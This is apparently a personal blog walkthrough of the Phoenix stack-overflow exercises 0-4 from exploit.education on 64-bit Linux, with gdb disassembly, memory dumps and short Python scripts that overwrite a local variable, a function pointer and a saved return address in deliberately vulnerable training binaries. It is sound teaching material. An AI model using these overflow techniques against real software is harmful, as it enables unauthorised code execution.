Buffer Overflow Prelude: exploit.education Phoenix 0-4 – Intel 64-Bit

I’ll outline my progress in binary exploitation on Linux. As a target, I’m using the Phoenix exercises from exploit.education, which can be found at http://exploit.education/phoenix/. However, I don’t use the provided virtual machines but rather copy the code to my local VM. This requires some small changes to the listed code examples, most notably commenting out the printf() with the BANNER message. One of the reasons for writing this blog post (apart from documenting my process) is that most tutorials I found use either AT&T syntax for the assembly or 32-bit code, and I wanted to use Intel syntax on a 64-bit system. I also want to use Python 3 as my scripting language of choice.

Buffer Overflows

The first type of binary exploit covered in the exercises is the stack-based buffer overflow. The canonical tutorial for buffer overflows, titled “Smashing the Stack for Fun and Profit”, can be found in Phrack issue 49, article 14 [1]. The basic idea is to put more data into a buffer than expected and thus have this data flow into areas of memory where it is not supposed to be. Modern Linux has various mechanisms that protect against buffer overflows (like canaries, address space layout randomization and non-executable stacks). To “get around” these mechanisms for exercise purposes, I’m compiling the binaries with the following settings (-fno-stack-protector disables stack canaries, -no-pie produces a non-position-independent executable with fixed code addresses, and -z execstack marks the stack as executable):

gcc -fno-stack-protector -no-pie -z execstack -o phoenix_stack0 phoenix_stack0.c

Disassembly

The disassembly of the main() function of Phoenix 0 (disass main) in gdb shows how the stack frame is set up. Note that I prefer Intel syntax, which can be enabled within gdb with set disassembly-flavor intel. We set three breakpoints: one at the beginning of main() (b *main), one before the call to gets() (b *0x0000000000401163) and one after it (b *0x0000000000401168).

0x0000000000401146 <+0>:   push  rbp
0x0000000000401147 <+1>:   mov   rbp,rsp
0x000000000040114a <+4>:   sub   rsp,0x60
0x000000000040114e <+8>:   mov   DWORD PTR [rbp-0x54],edi
0x0000000000401151 <+11>:  mov   QWORD PTR [rbp-0x60],rsi
0x0000000000401155 <+15>:  mov   DWORD PTR [rbp-0x10],0x0
0x000000000040115c <+22>:  lea   rax,[rbp-0x50]
0x0000000000401160 <+26>:  mov   rdi,rax
0x0000000000401163 <+29>:  call  0x401040 <gets@plt>
0x0000000000401168 <+34>:  mov   eax,DWORD PTR [rbp-0x10]
0x000000000040116b <+37>:  test  eax,eax
0x000000000040116d <+39>:  je    0x401180 <main+58>
0x000000000040116f <+41>:  lea   rax,[rip+0xe92] # 0x402008
0x0000000000401176 <+48>:  mov   rdi,rax
0x0000000000401179 <+51>:  call  0x401030 <puts@plt>
0x000000000040117e <+56>:  jmp   0x40118f <main+73>
0x0000000000401180 <+58>:  lea   rax,[rip+0xeb9] # 0x402040
0x0000000000401187 <+65>:  mov   rdi,rax
0x000000000040118a <+68>:  call  0x401030 <puts@plt>
0x000000000040118f <+73>:  mov   edi,0x0
0x0000000000401194 <+78>:  call  0x401050 <exit@plt>

In the code, the base pointer (rbp), which marks the base of the caller’s stack frame, is pushed onto the stack so that it can be restored later (<+0>). The push instruction also decreases rsp by 8 so that it points to the new top of the stack. Next, the stack pointer (rsp) is copied into rbp, which creates the base of the new stack frame used by main() (<+1>). Then 0x60 (96 decimal, or 24 words if a word is 4 bytes) is subtracted from rsp, which reserves that much space for the frame (<+4>).

According to the 64-bit ABI [2], the first six integer or pointer arguments of a function are passed in registers. rdi (and thus edi, its lower 32 bits) contains the first argument and rsi contains the second (the 3rd, 4th, 5th and 6th arguments are passed in rdx, rcx, r8 and r9). Since this is the main() function, those are argc (edi) and **argv (rsi) respectively. Next, the arguments are moved from registers to memory: edi/argc is moved to the memory at [rbp-0x54] (<+8>) and rsi/**argv is moved to the memory at [rbp-0x60] (<+11>). After that, locals.changeme (at rbp-0x10) is set to 0 (<+15>). Finally, the address of locals.buffer (rbp-0x50) is loaded into rax (<+22>) and rax is moved into rdi to make it the first argument of the next function call (<+26>), which is gets() (<+29>).

Stack

On x86, the stack “grows” from high addresses to low addresses. Thus, the bottom of the stack frame (where rbp points) has a higher address than the top (where rsp points). You can check the memory allocated for the stack in gdb by running info proc mappings and find more information about a stack frame by issuing info frame n, where n is the number of the frame (all frames can be listed by running bt). In gdb, running x/30wx $rsp displays 30 words of memory starting at $rsp in hex. Note that gdb displays the high memory addresses at the bottom (so you can visualize the stack growing up) and that each group of 8 hex digits represents one word (4 bytes), because two hex digits represent one byte.

At this point in time, the stack looks like this:

  • rbp is at 0x7fffffffde80
  • locals.changeme (rbp-0x10) is at 0x7fffffffde70 (0x00000000)
  • The space for locals.buffer (rbp-0x50) starts at 0x7fffffffde30
  • argc (rbp-0x54) is at 0x7fffffffde2c (0x00000001)
  • **argv (rbp-0x60) is at 0x7fffffffde20
  • rsp is at 0x7fffffffde20

(gdb) x/30wx $rsp
0x7fffffffde20: 0xffffdf78 0x00007fff 0x00000000 0x00000001
0x7fffffffde30: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffde40: 0x00000000 0x00000000 0x004011e5 0x00000000
0x7fffffffde50: 0x00000000 0x00000000 0x004011a0 0x00000000
0x7fffffffde60: 0x00000000 0x00000000 0x00401060 0x00000000
0x7fffffffde70: 0x00000000 0x00007fff 0x00000000 0x00000000
0x7fffffffde80: 0x00000000 0x00000000 0xf7dfd7fd 0x00007fff
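
The addresses in the list above follow directly from the offsets in the disassembly. As a quick sanity check, the following sketch recomputes them in Python. The rbp value is the one from my gdb session and will differ on other machines, and the dictionary name offsets is only for illustration.

```python
# rbp as observed in the gdb session above (machine specific)
rbp = 0x7fffffffde80

# Offsets below rbp, taken from the disassembly of main()
offsets = {
    "locals.changeme": 0x10,
    "locals.buffer": 0x50,
    "argc": 0x54,
    "argv": 0x60,
}

# Each local lives at rbp minus its offset
addresses = {name: rbp - off for name, off in offsets.items()}
for name, addr in addresses.items():
    print(f"{name:16} rbp-{offsets[name]:#x} -> {addr:#x}")

# rsp after "sub rsp,0x60"
rsp = rbp - 0x60
print(f"rsp -> {rsp:#x}")
```

The computed values should match the first column of the x/30wx output for the corresponding rows.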

In order to overflow locals.buffer (which starts at 0x7fffffffde30 or rbp-0x50) and write to locals.changeme (located at 0x7fffffffde70 or rbp-0x10), we have to send more than 16 words to gets(), because (0x50-0x10)/4 = 16. So if we input the following string (note that each character is one byte, so a block like AAAA is four bytes or one word), the final QQQQ block should overwrite locals.changeme: “AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ”.

0x7fffffffde20: 0xffffdf78 0x00007fff 0x00000000 0x00000001
0x7fffffffde30: 0x41414141 0x42424242 0x43434343 0x44444444
0x7fffffffde40: 0x45454545 0x46464646 0x47474747 0x48484848
0x7fffffffde50: 0x49494949 0x4a4a4a4a 0x4b4b4b4b 0x4c4c4c4c
0x7fffffffde60: 0x4d4d4d4d 0x4e4e4e4e 0x4f4f4f4f 0x50505050
0x7fffffffde70: 0x51515151 0x00007f00 0x00000000 0x00000000
0x7fffffffde80: 0x00000000 0x00000000 0xf7dfd7fd 0x00007fff
0x7fffffffde90: 0xffffdf78 0x00007fff

And indeed this does the trick.

(gdb) c
Continuing.
Well done, the 'changeme' variable has been changed!
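
The padding length and the pattern string do not have to be typed by hand. The sketch below derives both from the two offsets in the disassembly. The helper name pattern() is my own and not part of any library.

```python
import string

BUFFER_OFFSET = 0x50    # locals.buffer is at rbp-0x50
CHANGEME_OFFSET = 0x10  # locals.changeme is at rbp-0x10


def pattern(words):
    """Return 'AAAABBBBCCCC...' with one letter per 4-byte word (max 26 words)."""
    return "".join(letter * 4 for letter in string.ascii_uppercase[:words])


padding = BUFFER_OFFSET - CHANGEME_OFFSET  # bytes between buffer and changeme
words = padding // 4                       # the same distance in 4-byte words
payload = pattern(words + 1)               # one extra word lands in changeme

print(padding, words)
print(payload)
```

Using a distinct letter per word makes it easy to see in the memory dump which part of the input ended up where.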

Command line exploit

With this information, it is possible to exploit the program without gdb by piping this string to the program’s standard input.

└─$ python -c "print('AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ')" | ./phoenix_stack0
Well done, the 'changeme' variable has been changed!

Phoenix 1

Phoenix 1 is similar to Phoenix 0, except that we are supposed to change locals.changeme to the specific value 0x496c5962. Since everything else is the same, we already know that the padding before we reach locals.changeme is 16 words or 64 bytes. The following Python script produces the string that we need:

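#!/usr/bin/python

import struct

# 64 bytes of padding fill locals.buffer up to locals.changeme
pad = "\x41" * 64
# "<I" packs the value as a 4-byte little-endian unsigned int
payload = struct.pack("<I", 0x496c5962)
# decode() works here because every payload byte is plain ASCII
print(pad + payload.decode())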

We save the script as shell_maker.py, make it executable with chmod +x, and voilà:

└─$ ./phoenix_stack1 `./shell_maker.py`                            
Well done, you have successfully set changeme to the correct value
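
The decode() call in the script only works because all four payload bytes happen to be ASCII. As a sketch of a more general variant, the payload can be kept as bytes and handed to the program directly. The function names build_payload() and run() are my own, and the binary path is an assumption about where the compiled exercise lives.

```python
import struct
import subprocess


def build_payload(value, pad_len=64):
    """Padding followed by the target value as a 4-byte little-endian integer."""
    return b"A" * pad_len + struct.pack("<I", value)


def run(binary="./phoenix_stack1"):
    """Pass the payload as argv[1]; on POSIX, subprocess accepts bytes arguments."""
    return subprocess.run([binary, build_payload(0x496c5962)])


payload = build_payload(0x496c5962)
print(payload[-4:])  # the bytes that end up in locals.changeme
```

Calling run() executes the exercise with the payload as its first argument. Command line arguments cannot contain null bytes, so this approach only works for values without a 0x00 byte, which is the case here.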

Phoenix 2

Phoenix 2 is similar to Phoenix 0 and 1, except that we are supposed to overflow the buffer from an environment variable and change locals.changeme to 0x0d0a090a. So we simply change the payload in our script to 0x0d0a090a, set the environment variable and run the code.

└─$ export ExploitEducation=`./shell_maker.py`
└─$ ./phoenix_stack2                          
Well done, you have successfully set changeme to the correct value
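
It is worth checking why the backtick assignment survives these particular bytes. 0x0d0a090a consists only of whitespace characters, and shell command substitution strips trailing newlines. The sketch below shows that the little-endian payload ends in a carriage return rather than a newline, so only the newline added by print() is removed. The env dictionary at the end is an alternative I am assuming for use with subprocess on POSIX, not something the exercise requires.

```python
import struct

payload = b"A" * 64 + struct.pack("<I", 0x0d0a090a)

# What the script prints: the payload plus the newline appended by print()
printed = payload + b"\n"

# Command substitution removes all trailing newlines and nothing else
after_substitution = printed.rstrip(b"\n")

print(payload[-4:])
print(after_substitution == payload)

# Possible environment for subprocess.run(["./phoenix_stack2"], env=env)
env = {b"ExploitEducation": payload}
```

Had the target value ended in 0x0a in memory, the substitution would have stripped that byte as well, and the subprocess route would have been the safer choice.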

Phoenix 3

For Phoenix 3, we are asked to overwrite a function pointer (a slight change to the printf() in complete_level() is required to get the program to run). To find the correct address, we can use gdb and simply run disass complete_level:

Dump of assembler code for function complete_level:
   0x0000000000401166 <+0>:	push   rbp
   0x0000000000401167 <+1>:	mov    rbp,rsp
   0x000000000040116a <+4>:	lea    rax,[rip+0xe97]        # 0x402008
   0x0000000000401171 <+11>:	mov    rdi,rax
   0x0000000000401174 <+14>:	call   0x401030 <puts@plt>
   0x0000000000401179 <+19>:	mov    edi,0x0
   0x000000000040117e <+24>:	call   0x401070 <exit@plt>
End of assembler dump.

Now that we know that our address is 0x401166, we can simply change the payload in shell_maker.py to this value and run the following:

└─$ ./shell_maker.py | ./phoenix_stack3   
calling function pointer @ 0x401166
Congratulations, you've finished :-) Well done!
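
One detail is easy to miss on a 64-bit system: a function pointer is 8 bytes wide, while struct.pack() with "I" only produces 4. The 4-byte payload presumably still works here because the upper bytes of the pointer are already zero before the overflow. The following sketch packs the full pointer with "<Q" instead. The names COMPLETE_LEVEL, PAD_LEN and emit() are my own, and the padding of 64 bytes is assumed to be unchanged from the earlier levels.

```python
import struct
import sys

COMPLETE_LEVEL = 0x401166  # address from "disass complete_level" above
PAD_LEN = 64               # assumed unchanged from the earlier levels

short = struct.pack("<I", COMPLETE_LEVEL)  # 4 bytes, upper half untouched
full = struct.pack("<Q", COMPLETE_LEVEL)   # 8 bytes, whole pointer set

payload = b"A" * PAD_LEN + full


def emit(stream=None):
    """Write the raw payload plus a newline, which gets() treats as end of input."""
    stream = stream or sys.stdout.buffer
    stream.write(payload + b"\n")


print(short.hex(), full.hex())
```

Calling emit() from a script and piping its output into ./phoenix_stack3 sends the bytes unchanged, without relying on decode().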

Phoenix 4

Phoenix 4 requires us to overwrite the saved instruction pointer. After setting breakpoints on main() and before and after the call to gets(), we can supply a long string and see what happens. We supply “AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ” and check the backtrace with bt.

(gdb) bt
#0  0x00000000004011ac in start_level ()
#1  0x5858585857575757 in ?? ()
#2  0x5a5a5a5a59595959 in ?? ()
#3  0x0000000100000000 in ?? ()
#4  0x0000000000000000 in ?? ()

As we can see, the return address in frame 1 is overwritten with 0x57 and 0x58 bytes. Python tells us that 0x57 is the ASCII character ‘W’, so everything before the first ‘W’ is padding, and we can calculate the length of that padding to be 88 bytes.

>>> chr(0x57)
'W'
>>> len('AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV')
88
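
Counting letters by hand works, but the offset can also be computed from the value that gdb reports for frame 1. The following sketch converts that value back into bytes and looks it up in the pattern. The variable names are mine.

```python
import string
import struct

# The pattern supplied to gets(): each uppercase letter repeated four times
pattern = "".join(letter * 4 for letter in string.ascii_uppercase).encode()

# Return address shown by "bt" for frame 1
overwritten = 0x5858585857575757

# The value sits in memory as 8 little-endian bytes
needle = struct.pack("<Q", overwritten)

# Position of those bytes in the input equals the padding length
offset = pattern.find(needle)
print(needle, offset)
```

The lookup only gives a unique answer because every 4-byte block in the pattern is different.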

Back in gdb, we find the address of complete_level(), which is 0x401156.

(gdb) disass complete_level 
Dump of assembler code for function complete_level:
   0x0000000000401156 <+0>:	push   rbp
   0x0000000000401157 <+1>:	mov    rbp,rsp
   0x000000000040115a <+4>:	lea    rax,[rip+0xea7]        # 0x402008
   0x0000000000401161 <+11>:	mov    rdi,rax
   0x0000000000401164 <+14>:	call   0x401030 <puts@plt>
   0x0000000000401169 <+19>:	mov    edi,0x0
   0x000000000040116e <+24>:	call   0x401060 <exit@plt>
End of assembler dump.

Armed with these two pieces of information, we can change our shell_maker.py and run it.

#!/usr/bin/python

import struct

pad = "\x41" * 88
payload = struct.pack("I", 0x401156)
print(pad+payload.decode())

└─$ ./shell_maker.py | ./phoenix_stack4
and will be returning to 0x401156
Congratulations, you've finished :-) Well done!

[1] http://phrack.org/issues/49/14.html

[2] https://raw.githubusercontent.com/wiki/hjl-tools/x86-psABI/x86-64-psABI-1.0.pdf